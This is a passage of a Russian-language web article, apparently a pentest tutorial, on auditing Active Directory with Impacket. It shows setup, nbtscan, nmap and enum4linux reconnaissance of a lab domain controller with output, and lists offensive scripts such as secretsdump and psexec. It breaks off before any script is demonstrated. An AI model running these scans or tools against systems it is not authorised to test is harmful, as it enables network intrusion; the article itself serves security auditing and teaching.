{"id":350117,"date":"2023-07-11T15:03:11","date_gmt":"2023-07-11T15:03:11","guid":{"rendered":"http:\/\/savepearlharbor.com\/?p=350117"},"modified":"-0001-11-30T00:00:00","modified_gmt":"-0001-11-29T21:00:00","slug":"","status":"publish","type":"post","link":"https:\/\/savepearlharbor.com\/?p=350117","title":{"rendered":"Active Directory \u0433\u043b\u0430\u0437\u0430\u043c\u0438 Impacket<\/span>"},"content":{"rendered":"
<\/div>\n
\n
\n
\n
<\/p>\n
<\/div>\n

<\/a>
\u041f\u0440\u0438 \u0430\u0443\u0434\u0438\u0442\u0435 Windows-\u0438\u043d\u0444\u0440\u0430\u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440 Impacket<\/font><\/b> \u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u0448\u0432\u0435\u0439\u0446\u0430\u0440\u0441\u043a\u0438\u043c \u043d\u043e\u0436\u043e\u043c, \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044f \u0430\u043a\u0442\u0438\u0432\u043d\u043e \u0432\u0437\u0430\u0438\u043c\u043e\u0434\u0435\u0439\u0441\u0442\u0432\u043e\u0432\u0430\u0442\u044c \u0441 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0430\u043c\u0438 \u043f\u043e \u0441\u0435\u0442\u0438, \u0434\u043b\u044f \u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u043f\u0440\u043e\u043f\u0440\u0438\u0435\u0442\u0430\u0440\u043d\u044b\u043c (\u0440\u043e\u0434\u043d\u044b\u043c \u0438\u043b\u0438 \u0443\u043c\u043e\u043b\u0447\u0430\u0442\u0435\u043b\u044c\u043d\u044b\u043c) \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u043e\u043c, \u043a\u043e\u043d\u0435\u0447\u043d\u043e \u0436\u0435, \u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f, PowerShell. \u041d\u043e \u0442\u0430\u043a \u0443\u0436 \u0441\u043b\u043e\u0436\u0438\u043b\u043e\u0441\u044c, \u0447\u0442\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0438\u0439 \u0438\u0437-\u043f\u043e\u0434 Linux \u2013 \u043d\u0435 \u043b\u0443\u0447\u0448\u0430\u044f \u043f\u0440\u0430\u043a\u0442\u0438\u043a\u0430, \u0441 \u0443\u0447\u0451\u0442\u043e\u043c \u0438\u043c\u0435\u044e\u0449\u0438\u0445\u0441\u044f \u0434\u043b\u044f \u044d\u0442\u043e\u0433\u043e open source \u0440\u0435\u0448\u0435\u043d\u0438\u0439. \u0411\u0443\u0434\u0443\u0447\u0438 \u043d\u0430\u043f\u0438\u0441\u0430\u043d\u043d\u044b\u043c \u043d\u0430 \u0432\u043e\u0437\u043b\u044e\u0431\u043b\u0435\u043d\u043d\u043e\u043c \u0432 IT-\u0441\u043e\u043e\u0431\u0449\u0435\u0441\u0442\u0432\u0435 Python, Impacket \u043e\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u0442 \u0442\u043e\u043b\u044c\u043a\u043e \u043f\u043e\u043b\u043e\u0436\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u0435 \u044d\u043c\u043e\u0446\u0438\u0438 \u043e\u0442 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u044f, \u0430 \u0442\u0430\u043a\u0436\u0435 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0442\u0438\u0432\u043d\u044b\u0435 \u0438 \u043f\u043e\u043b\u0435\u0437\u043d\u044b\u0435 \u0440\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442\u044b, \u0430 \u0432 \u043d\u0435\u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u0441\u043b\u0443\u0447\u0430\u044f\u0445 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0438 \u0432\u043e\u0432\u0441\u0435 \u043e\u043a\u043e\u043d\u0447\u0438\u0442\u044c \u0430\u0443\u0434\u0438\u0442, \u0441\u0442\u0430\u0432 \u0430\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u043e\u0440\u043e\u043c \u0434\u043e\u043c\u0435\u043d\u0430. \u0426\u0435\u043b\u044c\u044e \u0441\u0442\u0430\u0442\u044c\u0438 \u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u043f\u043e\u043a\u0430\u0437\u0430\u0442\u044c \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u0438 \u0440\u0430\u0441\u0441\u043c\u0430\u0442\u0440\u0438\u0432\u0430\u0435\u043c\u043e\u0433\u043e \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u043d\u043e\u0433\u043e \u043e\u0431\u0435\u0441\u043f\u0435\u0447\u0435\u043d\u0438\u044f \u043d\u0430 \u043f\u0440\u0438\u043c\u0435\u0440\u0435 \u0440\u0435\u0430\u043b\u044c\u043d\u043e\u0439 \u0441\u0435\u0442\u0438 \u043f\u043e\u0434 \u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0435\u043c Active Directory, \u0438 \u043f\u043e\u0434\u0441\u0432\u0435\u0442\u0438\u0442\u044c \u043d\u0430\u0438\u0431\u043e\u043b\u0435\u0435 \u0441\u0438\u043b\u044c\u043d\u044b\u0435 \u0435\u0433\u043e \u0441\u0442\u043e\u0440\u043e\u043d\u044b. \u0424\u043e\u0440\u043c\u0430\u0442 \u0441\u0442\u0430\u0442\u044c\u0438 \u2013 \u043e\u0431\u0437\u043e\u0440 \u0432\u0445\u043e\u0434\u044f\u0449\u0438\u0445 \u0432 \u0435\u0433\u043e \u0441\u043e\u0441\u0442\u0430\u0432 \u0441\u0446\u0435\u043d\u0430\u0440\u0438\u0435\u0432 \u0441 \u043f\u0440\u0430\u043a\u0442\u0438\u0447\u0435\u0441\u043a\u0438\u043c\u0438 \u043f\u0440\u0438\u043c\u0435\u0440\u0430\u043c\u0438, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0432 \u043d\u0430\u0438\u043c\u0435\u043d\u044c\u0448\u0435\u0439 \u043c\u0435\u0440\u0435 \u0437\u0430\u0438\u043c\u0441\u0442\u0432\u0443\u0435\u0442\u0441\u044f \u0438\u0437 \u0430\u043d\u0430\u043b\u043e\u0433\u0438\u0447\u043d\u044b\u0445 \u0438\u043d\u043e\u0441\u0442\u0440\u0430\u043d\u043d\u044b\u0445 \u043f\u0443\u0431\u043b\u0438\u043a\u0430\u0446\u0438\u0439. \u0421\u0442\u0430\u0442\u044c\u044f \u043d\u043e\u0441\u0438\u0442 \u043e\u0431\u0437\u043e\u0440\u043d\u044b\u0439 \u043e\u0437\u043d\u0430\u043a\u043e\u043c\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u0439 \u0445\u0430\u0440\u0430\u043a\u0442\u0435\u0440, \u0434\u0435\u043c\u043e\u043d\u0441\u0442\u0440\u0438\u0440\u0443\u044f \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u0438 \u043f\u0440\u0438\u043c\u0435\u043d\u0435\u043d\u0438\u044f Impacket, \u0438 \u0430\u0434\u0430\u043f\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u0430 \u043e\u0441\u043e\u0431\u0435\u043d\u043d\u043e \u0434\u043b\u044f \u0442\u0435\u0445, \u043a\u0442\u043e \u0432 \u0442\u0435\u043c\u0435 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u043e\u043d\u043d\u043e\u0439 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438, \u0437\u043d\u0430\u043a\u043e\u043c \u0441 Windows Server \u043d\u0435 \u043f\u043e\u043d\u0430\u0441\u043b\u044b\u0448\u043a\u0435, \u0438 \u043f\u0440\u0438 \u044d\u0442\u043e\u043c \u0440\u0430\u0441\u0441\u043c\u0430\u0442\u0440\u0438\u0432\u0430\u0435\u043c\u044b\u043c\u0438 \u0441\u043a\u0440\u0438\u043f\u0442\u0430\u043c\u0438 \u0442\u043e\u043b\u043a\u043e\u043c \u0435\u0449\u0451 \u043d\u0435 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b\u0441\u044f.
<\/a>
Impacket<\/a> \u2014 \u044d\u0442\u043e \u043d\u0430\u0431\u043e\u0440 \u043a\u043b\u0430\u0441\u0441\u043e\u0432 Python \u0434\u043b\u044f \u0440\u0430\u0431\u043e\u0442\u044b \u0441 \u0441\u0435\u0442\u0435\u0432\u044b\u043c\u0438 \u043f\u0440\u043e\u0442\u043e\u043a\u043e\u043b\u0430\u043c\u0438, \u0438 \u0432 \u043f\u0435\u0440\u0432\u0443\u044e \u043e\u0447\u0435\u0440\u0435\u0434\u044c \u0441 Active Directory. \u041f\u0440\u0435\u0434\u0443\u0441\u0442\u0430\u043d\u043e\u0432\u043b\u0435\u043d \u0432 Kali \u0438 \u0430\u043d\u0430\u043b\u043e\u0433\u0438\u0447\u043d\u044b\u0445 \u0435\u043c\u0443 \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u0438\u0437\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0445 \u0434\u0438\u0441\u0442\u0440\u0438\u0431\u0443\u0442\u0438\u0432\u0430\u0445 (\/usr\/share\/doc\/python3-impacket\/examples\/<\/i>). \u0415\u0441\u043b\u0438 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u0435 \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0435\u0442\u0441\u044f \u043d\u0430 \u0434\u0440\u0443\u0433\u043e\u0439 \u043e\u043f\u0435\u0440\u0430\u0446\u0438\u043e\u043d\u043d\u043e\u0439 \u0441\u0438\u0441\u0442\u0435\u043c\u0435 \u0432 \u043a\u0430\u043a\u043e\u043c-\u043d\u0438\u0431\u0443\u0434\u044c \u0445\u0438\u0442\u0440\u043e\u043c \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u043c \u0432\u0430\u0440\u0438\u0430\u043d\u0442\u0435 \u0447\u0435\u0440\u0435\u0437 \u043e\u0431\u044b\u043a\u043d\u043e\u0432\u0435\u043d\u043d\u044b\u0439 Debian, \u0442\u043e \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0443\u044e \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u043a\u0443 \u043f\u0440\u043e\u0432\u0435\u0441\u0442\u0438 \u0432 \u0432\u0438\u0440\u0442\u0443\u0430\u043b\u044c\u043d\u043e\u043c \u043e\u043a\u0440\u0443\u0436\u0435\u043d\u0438\u0438, \u0447\u0442\u043e\u0431\u044b \u0438\u0441\u043a\u043b\u044e\u0447\u0438\u0442\u044c \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u044b \u0441 \u0437\u0430\u0432\u0438\u0441\u0438\u043c\u043e\u0441\u0442\u044f\u043c\u0438 \u0434\u043b\u044f \u0434\u0440\u0443\u0433\u0438\u0445 \u043f\u0440\u043e\u0435\u043a\u0442\u043e\u0432, \u0438\u043c\u0435\u044e\u0449\u0438\u0445\u0441\u044f \u043d\u0430 \u0441\u0435\u0440\u0432\u0435\u0440\u0435:<\/p>\n

git clone https:\/\/github.com\/fortra\/impacket.git apt install python3-venv python3 -m venv venv source venv\/bin\/activate python3 -m pip install --upgrade pip pip3 install -r requirements.txt <\/code><\/pre>\n
  \u0412 \u0442\u0430\u043a\u043e\u043c \u0441\u043b\u0443\u0447\u0430\u0435 \u043f\u0440\u0438 \u043a\u0430\u0436\u0434\u043e\u043c \u043f\u043e\u0432\u0442\u043e\u0440\u043d\u043e\u043c \u043e\u0442\u043a\u0440\u044b\u0442\u0438\u0438 \u0432\u0438\u0440\u0442\u0443\u0430\u043b\u044c\u043d\u043e\u0433\u043e \u0442\u0435\u0440\u043c\u0438\u043d\u0430\u043b\u0430 \u043d\u0435\u043e\u0431\u0445\u043e\u0434\u0438\u043c\u043e \u0430\u043a\u0442\u0438\u0432\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u0441\u043e\u0437\u0434\u0430\u043d\u043d\u043e\u0435 \u0432\u044b\u0448\u0435 \u0432\u0438\u0440\u0442\u0443\u0430\u043b\u044c\u043d\u043e\u0435 \u043e\u043a\u0440\u0443\u0436\u0435\u043d\u0438\u0435. \u0414\u043b\u044f \u044d\u0442\u043e\u0433\u043e \u0432 \u043a\u0430\u0442\u0430\u043b\u043e\u0433\u0435 \u0441 Impacket, \u0432 \u043a\u043e\u0442\u043e\u0440\u043e\u043c \u043d\u0430\u0445\u043e\u0434\u0438\u0442\u0441\u044f \u043a\u0430\u0442\u0430\u043b\u043e\u0433 venv<\/i>, \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0435\u043c:<\/p>\n
python3 -m venv venv <\/code><\/pre>\n
  \u0421\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u0439 \u0432\u044b\u0432\u043e\u0434 \u0441\u0432\u0438\u0434\u0435\u0442\u0435\u043b\u044c\u0441\u0442\u0432\u0443\u0435\u0442, \u0447\u0442\u043e \u0432\u0441\u0451 \u0441\u0434\u0435\u043b\u0430\u043d\u043e \u0432\u0435\u0440\u043d\u043e:<\/p>\n
(venv) <\/code><\/pre>\n
  \u0421 \u044d\u0442\u043e\u0433\u043e \u043c\u043e\u043c\u0435\u043d\u0442\u0430 \u043e\u0431\u044a\u0435\u043a\u0442 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u044f \u0433\u043e\u0442\u043e\u0432 \u043a \u043f\u0440\u0438\u043c\u0435\u043d\u0435\u043d\u0438\u044e.<\/p>\n
1. \u0410\u043d\u0430\u043b\u0438\u0437 \u043b\u0430\u0431\u043e\u0440\u0430\u0442\u043e\u0440\u043d\u043e\u0433\u043e \u0441\u0442\u0435\u043d\u0434\u0430<\/font><\/h2>\n
  \u0414\u043b\u044f \u0440\u0430\u0431\u043e\u0442\u044b \u043d\u0435\u043e\u0431\u0445\u043e\u0434\u0438\u043c \u043c\u0438\u043d\u0438\u043c\u0443\u043c L3 \u0434\u043e\u0441\u0442\u0443\u043f \u0434\u043e \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u043b\u0435\u0440\u0430 \u0434\u043e\u043c\u0435\u043d\u0430. VPN \u0442\u043e\u0436\u0435 \u043f\u043e\u0434\u043e\u0439\u0434\u0451\u0442. \u0412 \u0438\u0441\u0441\u043b\u0435\u0434\u0443\u0435\u043c\u043e\u0439 \u0441\u0435\u0442\u0438 \u043d\u0430\u0445\u043e\u0434\u044f\u0442\u0441\u044f:<\/p>\n
# apt install nbtscan  nbtscan -r 192.168.1.0\/24 Doing NBT name scan for addresses from 192.168.1.0\/24  IP address       NetBIOS Name     Server    User             MAC address ------------------------------------------------------------------------------ 192.168.1.13     WIN-LIELOSOD7LK  <server>  <unknown>        99:3f:d5:65:97:99 <\/code><\/pre>\n
  \u0410\u043d\u0430\u043b\u0438\u0437 \u043e\u0442\u043a\u0440\u044b\u0442\u044b\u0445 TCP \u043f\u043e\u0440\u0442\u043e\u0432 \u043f\u043e\u043a\u0430\u0437\u044b\u0432\u0430\u0435\u0442 \u0442\u0438\u043f\u0438\u0447\u043d\u0443\u044e \u043a\u0430\u0440\u0442\u0438\u043d\u0443 \u0440\u0430\u0431\u043e\u0442\u044b \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u043b\u0435\u0440\u0430 \u0434\u043e\u043c\u0435\u043d\u0430 Active Directory:<\/p>\n
# apt install nmap  nmap 192.168.1.0\/24  Host is up (0.31s latency). Not shown: 987 closed tcp ports (reset) PORT     STATE SERVICE 53\/tcp   open  domain 88\/tcp   open  kerberos-sec 135\/tcp  open  msrpc 139\/tcp  open  netbios-ssn 389\/tcp  open  ldap 443\/tcp  open  https 445\/tcp  open  microsoft-ds 464\/tcp  open  kpasswd5 593\/tcp  open  http-rpc-epmap 636\/tcp  open  ldapssl 3268\/tcp open  globalcatLDAP 3269\/tcp open  globalcatLDAPssl 3389\/tcp open  ms-wbt-server <\/code><\/pre>\n
  \u0422\u0438\u043f\u0438\u0447\u043d\u0430\u044f, \u043f\u043e\u0442\u043e\u043c\u0443 \u0447\u0442\u043e \u043d\u0430 \u043d\u0451\u043c \u0437\u0430\u043f\u0443\u0449\u0435\u043d DNS \u0441\u0435\u0440\u0432\u0435\u0440 (53\/tcp \u043f\u043e\u0440\u0442 \u043f\u0440\u0438\u043c\u0435\u043d\u044f\u0435\u0442\u0441\u044f DNS \u0441\u0435\u0440\u0432\u0435\u0440\u043e\u043c \u0434\u043b\u044f \u0442\u0440\u0430\u043d\u0441\u0444\u0435\u0440\u0430 \u0437\u043e\u043d, 53\/udp \u043f\u043e\u0440\u0442 \u0434\u043b\u044f \u043f\u043e\u0434\u043a\u043b\u044e\u0447\u0435\u043d\u0438\u044f DNS \u043a\u043b\u0438\u0435\u043d\u0442\u043e\u0432), \u0430 \u0442\u0430\u043a\u0436\u0435 \u0440\u0430\u0431\u043e\u0442\u0430\u044e\u0442 Kerberos<\/a> \u0438 Ldap<\/a>, \u0432\u0441\u0435 \u0442\u0440\u043e\u0435 \u0432 Windows-\u043e\u043a\u0440\u0443\u0436\u0435\u043d\u0438\u0438 \u0432\u044b\u0434\u0430\u044e\u0442 \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u043b\u0435\u0440 \u0434\u043e\u043c\u0435\u043d\u0430. \u0427\u0442\u043e\u0431\u044b \u043d\u0435 \u0443\u0445\u043e\u0434\u0438\u0442\u044c \u043e\u0442 \u043f\u0440\u0435\u0434\u043c\u0435\u0442\u0430 \u0440\u0430\u0437\u0433\u043e\u0432\u043e\u0440\u0430, \u043d\u0430\u0437\u043d\u0430\u0447\u0435\u043d\u0438\u0435 \u0443\u043a\u0430\u0437\u0430\u043d\u043d\u044b\u0445 \u0432\u044b\u0448\u0435 \u043f\u0440\u043e\u0442\u043e\u043a\u043e\u043b\u043e\u0432 \u043d\u0435 \u0440\u0430\u0441\u043a\u0440\u044b\u0442\u043e. \u041f\u043e\u0441\u043c\u043e\u0442\u0440\u0438\u043c \u043b\u0443\u0447\u0448\u0435, \u0447\u0442\u043e \u043d\u0430\u043c \u043c\u043e\u0436\u0435\u0442 \u0440\u0430\u0441\u0441\u043a\u0430\u0437\u0430\u0442\u044c \u0440\u0430\u0431\u043e\u0442\u0430\u044e\u0449\u0430\u044f \u043d\u0430 \u0441\u0435\u0440\u0432\u0435\u0440\u0435 \u0441\u043b\u0443\u0436\u0431\u0430 SMB<\/a>:<\/p>\n
# apt install enum4linux  enum4linux 192.168.1.13   Starting enum4linux v0.9.1 ( http:\/\/labs.portcullis.co.uk\/application\/enum4linux\/ ) on Thu Feb 15 04:22:31 2023  =========================================( Target Information )========================================= Target ........... 192.168.1.13 RID Range ........ 500-550,1000-1050 Username ......... '' Password ......... '' Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none  ============================( Enumerating Workgroup\/Domain on 192.168.1.13 )============================ [+] Got domain\/workgroup name: AD  ================================( Nbtstat Information for 192.168.1.13 )================================ Looking up status of 192.168.1.13         WIN-LIELOSOD7LK <00> -         B <ACTIVE>  Workstation Service         AD              <00> - <GROUP> B <ACTIVE>  Domain\/Workgroup Name         AD              <1c> - <GROUP> B <ACTIVE>  Domain Controllers         WIN-LIELOSOD7LK <20> -         B <ACTIVE>  File Server Service         AD              <1b> -         B <ACTIVE>  Domain Master Browser  ===================================( Session Check on 192.168.1.13 )=================================== [+] Server 192.168.1.13 allows sessions using username '', password ''  ================================( Getting domain SID for 192.168.1.13 )================================ Domain Name: AD Domain Sid: S-1-5-21-1377681614-1103095939-2089592296 [+] Host is part of a domain (not a workgroup) <\/code><\/pre>\n
  AD<\/i> \u2013 \u044d\u0442\u043e \u0438\u043c\u044f \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u043b\u0435\u0440\u0430 \u0434\u043e\u043c\u0435\u043d\u0430 \u0432 \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u0435\u043d\u0438\u0438 \u0434\u043b\u044f \u043e\u043f\u0435\u0440\u0430\u0446\u0438\u043e\u043d\u043d\u044b\u0445 \u0441\u0438\u0441\u0442\u0435\u043c \u0434\u043e Windows 2000, \u0430 WIN-LIELOSOD7LK<\/i> \u2013 \u0438\u043c\u044f \u0441\u0435\u0440\u0432\u0435\u0440\u0430. \u041d\u0430 \u0441\u0430\u043c\u043e\u043c \u0434\u0435\u043b\u0435 \u044d\u0442\u043e\u0433\u043e \u043d\u0435\u0434\u043e\u0441\u0442\u0430\u0442\u043e\u0447\u043d\u043e \u0434\u043b\u044f \u0434\u0430\u043b\u044c\u043d\u0435\u0439\u0448\u0435\u0433\u043e \u0430\u043d\u0430\u043b\u0438\u0437\u0430, \u0442\u0430\u043a \u043a\u0430\u043a \u043d\u0435 \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u043b\u0435\u043d\u043e \u0438\u043c\u044f \u0434\u043e\u043c\u0435\u043d\u0430 Active Directory (\u0432 \u043e\u0431\u044b\u043a\u043d\u043e\u0432\u0435\u043d\u043d\u043e\u0439 \u0438\u043d\u0442\u0435\u0440\u043f\u0440\u0435\u0442\u0430\u0446\u0438\u0438). \u041d\u0435\u043c\u043d\u043e\u0433\u043e \u043e\u0442\u0432\u043b\u0435\u043a\u0430\u044f\u0441\u044c \u043e\u0442 \u0442\u0435\u043c\u044b, \u044d\u0442\u043e \u043c\u043e\u0436\u043d\u043e \u0441\u0434\u0435\u043b\u0430\u0442\u044c \u043f\u0440\u0438 \u043f\u043e\u043c\u043e\u0449\u0438 \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u044c\u043d\u044b\u0445 \u0441\u043a\u0440\u0438\u043f\u0442\u043e\u0432 PowerShell, \u043d\u0430\u043f\u0440\u0438\u043c\u0435\u0440, \u0438\u0437 \u0441\u043e\u0441\u0442\u0430\u0432\u0430 \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u044b\u0445 \u0432 \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u0438\u0437\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0445 \u043a\u0440\u0443\u0433\u0430\u0445 Recon<\/a> \u0438\u043b\u0438 BloodHound<\/a>:<\/p>\n
Discover-PSInterestingServices Invoke-BloodHound -SearchFores <\/code><\/pre>\n
  \u0412 \u043d\u0430\u0448\u0435\u043c \u0441\u043b\u0443\u0447\u0430\u0435 \u0434\u043e\u043c\u0435\u043d\u043e\u043c \u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f ad.ruvds.ru<\/i>, \u0442\u0430\u043a\u0438\u043c \u043e\u0431\u0440\u0430\u0437\u043e\u043c, \u043f\u043e\u043b\u043d\u043e\u0435 \u0438\u043c\u044f \u0441\u0435\u0440\u0432\u0435\u0440\u0430 (FQDN<\/a>) WIN-LIELOSOD7LK.ad.ruvds.ru<\/i>. \u0414\u0430\u043b\u0435\u0435 \u0432\u0441\u0435 \u043e\u0441\u0442\u0430\u043b\u044c\u043d\u044b\u0435 \u043c\u0430\u043d\u0438\u043f\u0443\u043b\u044f\u0446\u0438\u0438 \u0431\u0443\u0434\u0435\u043c \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0442\u044c \u043f\u0440\u0438 \u043f\u043e\u043c\u043e\u0449\u0438 \u0438\u0441\u0441\u043b\u0435\u0434\u0443\u0435\u043c\u043e\u0433\u043e \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u043d\u043e\u0433\u043e \u043e\u0431\u0435\u0441\u043f\u0435\u0447\u0435\u043d\u0438\u044f.<\/p>\n
2. Impacket \u2013 \u043c\u043e\u0449\u043d\u044b\u0439 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442 \u0430\u0443\u0434\u0438\u0442\u0430 Active Directory<\/font>
  <\/h2>\n
  \u041f\u0430\u043a\u0435\u0442 Impacket \u0432\u043a\u043b\u044e\u0447\u0430\u0435\u0442 \u0432\u043f\u0435\u0447\u0430\u0442\u043b\u044f\u044e\u0449\u0438\u0439 \u043d\u0430\u0431\u043e\u0440 \u0441\u043a\u0440\u0438\u043f\u0442\u043e\u0432, \u043d\u0430\u0437\u0432\u0430\u043d\u0438\u0435 \u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u0437\u0430\u0447\u0430\u0441\u0442\u0443\u044e \u0433\u043e\u0432\u043e\u0440\u0438\u0442 \u0441\u0430\u043c\u043e \u0437\u0430 \u0441\u0435\u0431\u044f. \u041d\u0430\u043f\u0440\u0438\u043c\u0435\u0440, mimikatz.py<\/a> \u2013 python \u0440\u0435\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u044f \u043e\u0434\u043d\u043e\u0438\u043c\u0451\u043d\u043d\u043e\u0433\u043e \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u0430, \u044f\u0432\u043b\u044f\u044e\u0449\u0435\u0433\u043e \u0434\u0435-\u0444\u0430\u043a\u0442\u043e \u0441\u0442\u0430\u043d\u0434\u0430\u0440\u0442\u043d\u044b\u043c \u0432 \u043d\u0430\u0431\u043e\u0440\u0435 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c \u0430\u0443\u0434\u0438\u0442\u0430 Windows. \u041f\u043e\u043b\u043d\u044b\u0439 \u0441\u043f\u0438\u0441\u043e\u043a \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u0439: addcomputer.py, atexec.py, dcomexec.py, dpapi.py, esentutl.py, exchanger.py, findDelegation.py, GetADUsers.py, getArch.py, GetNPUsers.py, getPac.py, getST.py, getTGT.py, GetUserSPNs.py, goldenPac.py, karmaSMB.py, kintercept.py, lookupsid.py, mimikatz.py, mqtt_check.py, mssqlclient.py, mssqlinstance.py, netview.py, mapAnswerMachine.py, ntfs-read.py, ntlmrelayx.py, ping6.py, ping.py, psexec.py, raiseChild.py, rdp_check.py, registry-read.py, reg.py, rpcdump.py, rpcmap.py, sambaPipe.py, samrdump.py, secretsdump.py, services.py, smbclient.py, smbexec.py, smbrelayx.py, mbserver.py, sniffer.py, sniff.py, split.py, ticketConverter.py, ticketer.py, wmiexec.py, wmipersist.py, wmiquery.py<\/i>.<\/p>\n
  \u0420\u0430\u0441\u0441\u043c\u043e\u0442\u0440\u0438\u043c \u043f\u0440\u0430\u043a\u0442\u0438\u043a\u0443 \u0438\u0445 \u043f\u0440\u0438\u043c\u0435\u043d\u0435\u043d\u0438\u044f \u043f\u0440\u0438 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u0438 \u043b\u0430\u0431\u043e\u0440\u0430\u0442\u043e\u0440\u043d\u043e\u0433\u043e \u0441\u0442\u0435\u043d\u0434\u0430. \u041e\u0431\u0449\u0438\u0439 \u0441\u0438\u043d\u0442\u0430\u043a\u0441\u0438\u0441 \u0438 \u043d\u0430\u0437\u043d\u0430\u0447\u0435\u043d\u0438\u044f \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u043e\u0432 \u0432\u0437\u044f\u0442\u044b \u0438\u0437 \u043e\u0440\u0438\u0433\u0438\u043d\u0430\u043b\u044c\u043d\u043e\u0433\u043e help<\/i>, \u043f\u043e\u044d\u0442\u043e\u043c\u0443 \u0441\u043f\u0440\u044f\u0442\u0430\u043d\u044b \u0432 \u043f\u0435\u0440\u0432\u043e\u043d\u0430\u0447\u0430\u043b\u044c\u043d\u043e\u043c \u0432\u0438\u0434\u0435 \u043f\u043e\u0434 \u0441\u043f\u043e\u0439\u043b\u0435\u0440\u044b. \u0415\u0441\u043b\u0438 \u043a\u043e\u0433\u043e-\u0442\u043e \u043e\u0441\u043e\u0431\u0435\u043d\u043d\u043e \u0437\u0430\u0438\u043d\u0442\u0435\u0440\u0435\u0441\u0443\u0435\u0442 \u043a\u0430\u043a\u043e\u0439-\u0442\u043e \u0438\u0437 \u0441\u043a\u0440\u0438\u043f\u0442\u043e\u0432, \u0442\u043e \u043c\u043e\u0436\u043d\u043e \u0437\u0430\u0433\u043b\u044f\u043d\u0443\u0442\u044c \u0432 \u0441\u043a\u0440\u044b\u0442\u044b\u0435 \u043c\u0430\u0442\u0435\u0440\u0438\u0430\u043b\u044b, \u0432 \u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u0434\u043e\u0441\u0442\u0430\u0442\u043e\u0447\u043d\u043e \u043f\u043e\u0434\u0440\u043e\u0431\u043d\u043e \u0440\u0430\u0441\u043a\u0440\u044b\u0442\u044b \u0432\u0441\u0435 \u0438\u043c\u0435\u044e\u0449\u0438\u0435\u0441\u044f \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u0438 \u0438 \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u044b. \u041e\u0434\u043d\u0430\u043a\u043e \u043f\u0440\u0438\u0432\u0435\u0434\u0451\u043d\u043d\u044b\u0435 \u043f\u0440\u0438\u043c\u0435\u0440\u044b \u0434\u043e\u0441\u0442\u0430\u0442\u043e\u0447\u043d\u044b \u0434\u043b\u044f \u043e\u0431\u0437\u043e\u0440\u043d\u043e\u0439 \u044d\u043a\u0441\u043a\u0443\u0440\u0441\u0438\u0438 \u0432 \u0446\u0438\u0444\u0440\u043e\u0432\u0443\u044e \u0440\u0435\u0430\u043b\u044c\u043d\u043e\u0441\u0442\u044c Impacket vs Active Directory<\/font><\/b>. \u041d\u0435\u043a\u043e\u0442\u043e\u0440\u044b\u0435 